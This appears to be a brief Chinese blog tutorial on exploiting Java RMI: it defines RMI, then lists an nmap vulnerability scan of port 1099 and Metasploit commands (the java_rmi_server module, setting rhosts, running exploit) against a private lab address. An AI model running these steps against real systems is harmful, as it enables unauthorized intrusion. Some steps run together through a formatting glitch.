Java_Rmi漏洞利用
Java RMI,即 远程方法调用(Remote Method Invocation),一种用于实现远程过程调用(RPC)(Remote procedure call)的Java API, 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于Java虚拟机(JVM),因此它仅支持从一个JVM到另一个JVM的调用。(来源:简书)
1.扫描漏洞
nmap --script=vuln -p 1099 192.168.84.128

2.选择exploit模块
use exploit/multi/misc/java_rmi_server3.设置靶机ip
set rhosts 192.168.84.1284.开始攻击
exploit

发表评论